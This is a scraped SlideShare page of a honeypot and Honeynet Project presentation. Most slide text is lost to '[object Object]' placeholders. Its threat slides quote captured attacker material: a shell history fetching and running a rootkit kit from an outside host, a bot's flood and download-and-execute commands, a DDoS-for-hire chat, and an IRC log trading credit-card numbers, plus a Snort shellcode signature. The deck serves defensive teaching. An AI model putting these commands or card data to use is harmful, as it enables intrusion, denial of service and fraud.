SlideShare una empresa de Scribd logo
1 de 102
Honeypot New technology for the security community By Tahoora Ketabdar
Honeypots ,[object Object],[object Object],[object Object],[object Object]
IDS
Advantages ,[object Object],[object Object],[object Object],[object Object],[object Object]
Disadvantages ,[object Object],[object Object],[object Object]
Types ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Examples of Honeypots ,[object Object],[object Object],[object Object],[object Object],Low Interaction High Interaction
قابليت هاي  Honeypots ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Specter ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
ليست پورت هاي تحت نظارت  Specter شنود پورت . وقتي اتصالي به وسيله نفوذگر برقرار شد،اين اتصال مختوم   (Terminate)   شده و اطلاعات مربوط به آن  log  مي گردد . ,[object Object],[object Object],[object Object]
Specter  تا سقف  17  سيستم عامل رامي تواند   اميوليت كند ,[object Object],[object Object]
Specter Service's personality  ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Intelligence gathering by specter ,[object Object],[object Object]
Snapshot of the Specter GUI Alert box هر حمله اي كه رخ داد ليست ميشود Status Personality Remote log intelligence gathering help
someone scanning for and logging into anonymous FTP servers ,[object Object],[object Object]
از   Windows version of Snort   مي توان در كنار  Specter   بهره برد  ,[object Object],[object Object]
Honeyd specification  ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
 
[object Object],[object Object],[object Object],[object Object],[object Object]
فايل پيكربندي  Honeyd ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
فراخواني يك برنامه  RPC
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Passive Fingerprinting IP Packet
TCP Segment
04/20-21:41:48.129662 129.142.224.3:659 -> 172.16.1.107:604 TCP TTL:45 TOS:0x0 ID:56257 ***F**A* Seq: 0x9DD90553  Ack: 0xE3C65D7 Win: 0x7D78 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Linux Kernel 2.2X
Honeynets ,[object Object],[object Object],[object Object],[object Object]
How it works ,[object Object],[object Object],[object Object],[object Object],[object Object]
Honeynet Architecture
Data Control ,[object Object],[object Object],[object Object],[object Object],[object Object]
NIDS
No Data Control
Data Control
Snort-Inline alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh";  alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh";  replace: "| 0000   E8D7 FFFFFF|/ ben/sh ";)
Data Capture ,[object Object],[object Object],[object Object],[object Object]
Sebek ,[object Object],[object Object],[object Object]
Sebek Architecture
Alerting ,[object Object],[object Object],[object Object]
Honeywall CDROM ,[object Object],[object Object],[object Object]
Eeyore Problems ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Roo Honeywall CDROM ,[object Object],[object Object],[object Object],[object Object],[object Object]
Installation ,[object Object],[object Object],[object Object]
First Boot
Install
Configure
3 Methods to Maintain ,[object Object],[object Object],[object Object],[object Object]
Command Line Interface ,[object Object],[object Object],[object Object]
Dialog Menu
Data Administration
Data Analysis ,[object Object],[object Object],[object Object]
Walleye
Data Analysis
Data Analysis Flows
Data Analysis Details
Processes مي تواند تصوير گراف پروسه ها را نيز رسم كند
Files
Distributed Capabilities
Honeynets and  The Honeynet Project
 
 
Purpose ,[object Object]
Agenda ,[object Object],[object Object],[object Object],[object Object]
Honeynet Project
Problem ,[object Object]
Mission Statement ,[object Object]
Our Goal ,[object Object],[object Object],[object Object],[object Object]
Honeynet Project ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Honeynet Research Alliance ,[object Object],[object Object]
Alliance Members ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
The Threat
What we have captured ,[object Object],[object Object]
The Threat ,[object Object],[object Object],[object Object],[object Object],[object Object]
The Threat
The Motive ,[object Object],[object Object],[object Object]
DDoS for Money J4ck: why don't you start charging for packet attacks? J4ck: "give me x amount and I'll take bla bla offline for this amount of time” J1LL: it was illegal last I checked J4ck: heh, then everything you do is illegal. Why not  make money off of it? J4ck:   I know plenty of people that'd pay exorbatent  amounts for packeting
The Target ,[object Object],[object Object],[object Object]
Interesting Trends ,[object Object],[object Object],[object Object]
The Tools ,[object Object],[object Object],[object Object]
The Old Days Jan 8 18:48:12 HISTORY: PID=1246 UID=0  lynx www.becys.org/LUCKROOT.TAR Jan 8 18:48:31 HISTORY: PID=1246 UID=0  y Jan 8 18:48:45 HISTORY: PID=1246 UID=0  tar -xvfz LUCKROOT.TAR   Jan 8 18:48:59 HISTORY: PID=1246 UID=0  tar -xzvf Lu Jan 8 18:49:01 HISTORY: PID=1246 UID=0  tar -xzvf L Jan 8 18:49:03 HISTORY: PID=1246 UID=0  tar -xzvf LUCKROOT.TAR   Jan 8 18:49:06 HISTORY: PID=1246 UID=0  cd luckroot Jan 8 18:49:13 HISTORY: PID=1246 UID=0  ./luckgo 216 210 Jan 8 18:51:07 HISTORY: PID=1246 UID=0  ./luckgo 200 120 Jan 8 18:51:43 HISTORY: PID=1246 UID=0  ./luckgo 64 120 Jan 8 18:52:00 HISTORY: PID=1246 UID=0  ./luckgo 216 200
Botnets ,[object Object],[object Object],[object Object]
How They Work ,[object Object],[object Object],[object Object],[object Object]
80% of traffic ,[object Object],[object Object],[object Object],[object Object],[object Object]
Bots ddos.synflood [host] [time] [delay] [port] starts an SYN flood ddos.httpflood [url] [number] [referrer] [recursive = true||false] starts a HTTP flood scan.listnetranges list scanned netranges scan.start starts all enabled scanners scan.stop stops all scanners http.download download a file via HTTP http.execute updates the bot via the given HTTP URL http.update executes a file from a given HTTP URL cvar.set spam_aol_channel [channel] AOL Spam - Channel name cvar.set spam_aol_enabled [1/0] AOL Spam - Enabled?
Numbers ,[object Object],[object Object],[object Object],[object Object],[object Object]
Botnet  Economy ,[object Object],[object Object],[object Object]
Phishing ,[object Object],[object Object],[object Object],[object Object]
The Sting
Getting the Info
Infrastructure ,[object Object],[object Object],[object Object],[object Object]
A Phishing Rootkit ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Credit Cards Exchanging 04:55:16 COCO_JAA: !cc 04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box 126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9) 04:55:42 COCO_JAA:  !cclimit 4407070000588951 04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard (5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel) 04:56:55 COCO_JAA: !cardablesite 04:57:22 COCO_JAA: !cardable electronics 04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics : *** 9(11 TraDecS Chk_bot FoR #goldcard9) 04:58:09 COCO_JAA:  !cclimit 4234294391131136 04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) : 9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
The Future ,[object Object],[object Object],[object Object]
Honeynets
Issues ,[object Object],[object Object],[object Object],[object Object]
Legal Contact for .mil / .gov ,[object Object],[object Object],[object Object],[object Object]
Learning More
Our Website ,[object Object],[object Object],[object Object],[object Object]
Our Book http://www.honeynet.org/book
Sponsoring YOU? Advanced Network Management Lab
How to Sponsor ,[object Object],[object Object],[object Object],[object Object],<project@honeynet.org> http://www.honeynet.org/funds/
Conclusion ,[object Object]
[object Object],[object Object]

Más contenido relacionado

La actualidad más candente

Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 
Access over Ethernet: Insecurites in AoE
Access over Ethernet: Insecurites in AoEAccess over Ethernet: Insecurites in AoE
Access over Ethernet: Insecurites in AoEamiable_indian
 
Placing backdoors-through-firewalls
Placing backdoors-through-firewallsPlacing backdoors-through-firewalls
Placing backdoors-through-firewallsAkapo Damilola
 
Certified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetCertified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetDavid Sweigert
 
Hunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsHunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsAndrew Case
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationAsep Sopyan
 
Ceh v8 labs module 11 session hijacking
Ceh v8 labs module 11 session hijackingCeh v8 labs module 11 session hijacking
Ceh v8 labs module 11 session hijackingAsep Sopyan
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowVi Tính Hoàng Nam
 
Ceh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersCeh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersMehrdad Jingoism
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceAsep Sopyan
 
Ceh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingCeh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingAsep Sopyan
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemBikrant Gautam
 

La actualidad más candente (20)

Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
 
Access over Ethernet: Insecurites in AoE
Access over Ethernet: Insecurites in AoEAccess over Ethernet: Insecurites in AoE
Access over Ethernet: Insecurites in AoE
 
Placing backdoors-through-firewalls
Placing backdoors-through-firewallsPlacing backdoors-through-firewalls
Placing backdoors-through-firewalls
 
Certified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetCertified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheet
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
 
Hunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsHunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory Forensics
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumeration
 
Database Firewall with Snort
Database Firewall with SnortDatabase Firewall with Snort
Database Firewall with Snort
 
snortinstallguide
snortinstallguidesnortinstallguide
snortinstallguide
 
Snort-IPS-Tutorial
Snort-IPS-TutorialSnort-IPS-Tutorial
Snort-IPS-Tutorial
 
Ceh v8 labs module 11 session hijacking
Ceh v8 labs module 11 session hijackingCeh v8 labs module 11 session hijacking
Ceh v8 labs module 11 session hijacking
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflow
 
Ceh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersCeh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffers
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of service
 
Intro To Hacking
Intro To HackingIntro To Hacking
Intro To Hacking
 
Ceh v5 module 03 scanning
Ceh v5 module 03 scanningCeh v5 module 03 scanning
Ceh v5 module 03 scanning
 
Security tools
Security  toolsSecurity  tools
Security tools
 
Ceh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingCeh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hacking
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
 

Destacado

Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...
Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...
Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...Kurt Kohn
 
Atlas de mortalidad y pérdidas económicas debido al clima OMM
Atlas de mortalidad y pérdidas económicas debido al clima OMMAtlas de mortalidad y pérdidas económicas debido al clima OMM
Atlas de mortalidad y pérdidas económicas debido al clima OMMhidrometeorologiaucv
 
Keep calm and carry on? Policy, psychology and the effects of 'economic war'
Keep calm and carry on? Policy, psychology and the effects of 'economic war'Keep calm and carry on? Policy, psychology and the effects of 'economic war'
Keep calm and carry on? Policy, psychology and the effects of 'economic war'Strategic Society Centre
 
Ementas da 4ª Mostra Gastronómica de Cacela
Ementas da 4ª Mostra Gastronómica de CacelaEmentas da 4ª Mostra Gastronómica de Cacela
Ementas da 4ª Mostra Gastronómica de Cacelapress.cmvrsa
 
Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.
Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.
Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.sssukhov
 
Ringfeder schrumpfscheiben de-en-18_03_2013_b
Ringfeder schrumpfscheiben de-en-18_03_2013_bRingfeder schrumpfscheiben de-en-18_03_2013_b
Ringfeder schrumpfscheiben de-en-18_03_2013_bEuropages2
 
«Agile and Scrum scalability - theory and practice» by Helen Prykhnych
 «Agile and Scrum scalability - theory and practice» by Helen Prykhnych «Agile and Scrum scalability - theory and practice» by Helen Prykhnych
«Agile and Scrum scalability - theory and practice» by Helen PrykhnychDive_into_Management
 
Интеграция инструментов маркетинга в социальных медиа в систему управления ма...
Интеграция инструментов маркетинга в социальных медиа в систему управления ма...Интеграция инструментов маркетинга в социальных медиа в систему управления ма...
Интеграция инструментов маркетинга в социальных медиа в систему управления ма...Andrey Markin
 
Bosch Power Tools NA Partner Program
Bosch Power Tools NA Partner ProgramBosch Power Tools NA Partner Program
Bosch Power Tools NA Partner ProgramJonathan Laverentz
 
Curruculu Vitae - Andre Van Wyk
Curruculu Vitae - Andre Van WykCurruculu Vitae - Andre Van Wyk
Curruculu Vitae - Andre Van WykAndre van Wyk
 
Slide Show Trevor Vuorenmaa #ENT3976
Slide Show Trevor Vuorenmaa #ENT3976Slide Show Trevor Vuorenmaa #ENT3976
Slide Show Trevor Vuorenmaa #ENT3976Trevor Vuorenmaa
 
Grammaticus (Carolus Cabanillas auctor)
Grammaticus (Carolus Cabanillas auctor)Grammaticus (Carolus Cabanillas auctor)
Grammaticus (Carolus Cabanillas auctor)Óscar Ramos
 
From Philippine Red Cross-BTC Module 1
From Philippine Red Cross-BTC Module 1From Philippine Red Cross-BTC Module 1
From Philippine Red Cross-BTC Module 1Edmund Villareal
 
High Quality Software Development with Agile and Scrum
High Quality Software Development with Agile and ScrumHigh Quality Software Development with Agile and Scrum
High Quality Software Development with Agile and ScrumLemi Orhan Ergin
 

Destacado (16)

Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...
Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...
Hoffstaedter & Kohn 2012 Dolmetschen und Dolmetschtraining in der virtuellen ...
 
Atlas de mortalidad y pérdidas económicas debido al clima OMM
Atlas de mortalidad y pérdidas económicas debido al clima OMMAtlas de mortalidad y pérdidas económicas debido al clima OMM
Atlas de mortalidad y pérdidas económicas debido al clima OMM
 
Keep calm and carry on? Policy, psychology and the effects of 'economic war'
Keep calm and carry on? Policy, psychology and the effects of 'economic war'Keep calm and carry on? Policy, psychology and the effects of 'economic war'
Keep calm and carry on? Policy, psychology and the effects of 'economic war'
 
Ementas da 4ª Mostra Gastronómica de Cacela
Ementas da 4ª Mostra Gastronómica de CacelaEmentas da 4ª Mostra Gastronómica de Cacela
Ementas da 4ª Mostra Gastronómica de Cacela
 
Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.
Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.
Таргет@Mail.ru.часть 3. Технологии. Ремаркетинг. Школьников Д.
 
Ringfeder schrumpfscheiben de-en-18_03_2013_b
Ringfeder schrumpfscheiben de-en-18_03_2013_bRingfeder schrumpfscheiben de-en-18_03_2013_b
Ringfeder schrumpfscheiben de-en-18_03_2013_b
 
«Agile and Scrum scalability - theory and practice» by Helen Prykhnych
 «Agile and Scrum scalability - theory and practice» by Helen Prykhnych «Agile and Scrum scalability - theory and practice» by Helen Prykhnych
«Agile and Scrum scalability - theory and practice» by Helen Prykhnych
 
Интеграция инструментов маркетинга в социальных медиа в систему управления ма...
Интеграция инструментов маркетинга в социальных медиа в систему управления ма...Интеграция инструментов маркетинга в социальных медиа в систему управления ма...
Интеграция инструментов маркетинга в социальных медиа в систему управления ма...
 
Bosch Power Tools NA Partner Program
Bosch Power Tools NA Partner ProgramBosch Power Tools NA Partner Program
Bosch Power Tools NA Partner Program
 
Aofog news letter
Aofog news letterAofog news letter
Aofog news letter
 
Curruculu Vitae - Andre Van Wyk
Curruculu Vitae - Andre Van WykCurruculu Vitae - Andre Van Wyk
Curruculu Vitae - Andre Van Wyk
 
Slide Show Trevor Vuorenmaa #ENT3976
Slide Show Trevor Vuorenmaa #ENT3976Slide Show Trevor Vuorenmaa #ENT3976
Slide Show Trevor Vuorenmaa #ENT3976
 
Grammaticus (Carolus Cabanillas auctor)
Grammaticus (Carolus Cabanillas auctor)Grammaticus (Carolus Cabanillas auctor)
Grammaticus (Carolus Cabanillas auctor)
 
From Philippine Red Cross-BTC Module 1
From Philippine Red Cross-BTC Module 1From Philippine Red Cross-BTC Module 1
From Philippine Red Cross-BTC Module 1
 
User stories
User storiesUser stories
User stories
 
High Quality Software Development with Agile and Scrum
High Quality Software Development with Agile and ScrumHigh Quality Software Development with Agile and Scrum
High Quality Software Development with Agile and Scrum
 

Similar a Honeypot technology for detecting new attacks

All About Snort
All About SnortAll About Snort
All About Snort28pranjal
 
Modul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptModul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptcemporku
 
modul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdfmodul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdftehkotak4
 
Information security & EthicalHacking
Information security & EthicalHackingInformation security & EthicalHacking
Information security & EthicalHackingAve Nawsh
 
Module 5 Sniffers
Module 5  SniffersModule 5  Sniffers
Module 5 Sniffersleminhvuong
 
Intimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkIntimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkAnimesh Roy
 
An Approach to for Improving the Efficiency of IDS System Using Honeypot
An Approach to for Improving the Efficiency of IDS System Using HoneypotAn Approach to for Improving the Efficiency of IDS System Using Honeypot
An Approach to for Improving the Efficiency of IDS System Using HoneypotEditor Jacotech
 
8 steps to protect your cisco router
8 steps to protect your cisco router8 steps to protect your cisco router
8 steps to protect your cisco routerIT Tech
 
Internet security
Internet securityInternet security
Internet securitygohel
 
Networking question
Networking questionNetworking question
Networking questionDEVBEJ
 
Derevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameDerevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameJaime Sánchez
 
Module 3 Scanning
Module 3   ScanningModule 3   Scanning
Module 3 Scanningleminhvuong
 
Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N NessusUtkarsh Verma
 
CEH v9 cheat sheet notes Certified Ethical Hacker
CEH v9 cheat sheet notes  Certified Ethical HackerCEH v9 cheat sheet notes  Certified Ethical Hacker
CEH v9 cheat sheet notes Certified Ethical HackerDavid Sweigert
 
Cyber_Threat_Intelligent_Cyber_Operation_Contest
Cyber_Threat_Intelligent_Cyber_Operation_ContestCyber_Threat_Intelligent_Cyber_Operation_Contest
Cyber_Threat_Intelligent_Cyber_Operation_Contestnkrafacyberclub
 

Similar a Honeypot technology for detecting new attacks (20)

Snort- Presentation.pptx
Snort- Presentation.pptxSnort- Presentation.pptx
Snort- Presentation.pptx
 
All About Snort
All About SnortAll About Snort
All About Snort
 
Modul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptModul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.ppt
 
modul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdfmodul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdf
 
Information security & EthicalHacking
Information security & EthicalHackingInformation security & EthicalHacking
Information security & EthicalHacking
 
OS Fingerprinting
OS FingerprintingOS Fingerprinting
OS Fingerprinting
 
Module 5 Sniffers
Module 5  SniffersModule 5  Sniffers
Module 5 Sniffers
 
Intimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkIntimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit Framework
 
1376841709 17879811
1376841709  178798111376841709  17879811
1376841709 17879811
 
An Approach to for Improving the Efficiency of IDS System Using Honeypot
An Approach to for Improving the Efficiency of IDS System Using HoneypotAn Approach to for Improving the Efficiency of IDS System Using Honeypot
An Approach to for Improving the Efficiency of IDS System Using Honeypot
 
1376841709 17879811
1376841709  178798111376841709  17879811
1376841709 17879811
 
8 steps to protect your cisco router
8 steps to protect your cisco router8 steps to protect your cisco router
8 steps to protect your cisco router
 
Internet security
Internet securityInternet security
Internet security
 
Internet security
Internet securityInternet security
Internet security
 
Networking question
Networking questionNetworking question
Networking question
 
Derevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameDerevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse game
 
Module 3 Scanning
Module 3   ScanningModule 3   Scanning
Module 3 Scanning
 
Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N Nessus
 
CEH v9 cheat sheet notes Certified Ethical Hacker
CEH v9 cheat sheet notes  Certified Ethical HackerCEH v9 cheat sheet notes  Certified Ethical Hacker
CEH v9 cheat sheet notes Certified Ethical Hacker
 
Cyber_Threat_Intelligent_Cyber_Operation_Contest
Cyber_Threat_Intelligent_Cyber_Operation_ContestCyber_Threat_Intelligent_Cyber_Operation_Contest
Cyber_Threat_Intelligent_Cyber_Operation_Contest
 

Último

Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 

Último (20)

Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Streamlining Python Development: A Guide to a Modern Project Setup
